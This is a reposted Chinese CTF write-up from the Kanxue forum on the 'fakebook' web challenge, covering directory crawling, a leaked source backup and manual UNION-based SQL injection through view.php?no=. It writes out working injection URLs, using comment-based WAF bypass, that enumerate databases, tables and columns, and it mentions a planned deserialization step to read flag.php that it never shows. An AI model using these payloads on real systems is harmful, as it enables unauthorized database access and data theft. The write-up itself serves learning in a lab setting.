进来后题目场景会给我们提供一个IP地址:http://111.198.29.45:58599下面开始进行解题。
首先通过brup对网站目录进行爬取,获取到一些有用的信息。通过brup对网站进行爬取后,发现一个可疑路径file:///var/www/flag.php还发现了robots.txt文件。我们对robots.txt文件进行访问。访问后发现一个可爬取的备份文件。进行访问,可以下载到源码。对代码进行审计,奈何代码0基础,先放着吧!进入页面首先访问的就是这个页面:
点击 join填写信息后发现我们的页面进行了跳转:发现no=1可疑的url,查看是否存在SQL注入:通过检测可以判断存在注入点可以进行注入,由于工具sqlmap过waf不太熟练下面手工进行注入。通过order by 判断列为4,大于4或小于均4报错,因此判断此列为4:http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata --+fakebook,information_schema,mysql,performance_schema,testhttp://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"--+http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema="fakebook"--+获取字段信息,查看字段发现我们提交的数据被序列化:猜想,是否可以在no=1注入处进行反序列化读取本地文件,反序列化语句构造:各位大佬不喜勿喷,小白一枚!希望能和各位大佬多多交流。看雪ID:xiaobaijia
https://bbs.pediy.com/user-881354.htm
*本文由看雪论坛 xiaobaijia 原创,转载请注明来自看雪社区。好书推荐
文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458303600&idx=1&sn=920469735b47ff6908a8438247adbf11&chksm=b1818cfa86f605ecc23b0f80eae23adc4a66d3d20c948929f7f30dd0d08f6df83e4781456674#rd
如有侵权请联系:admin#unsafe.sh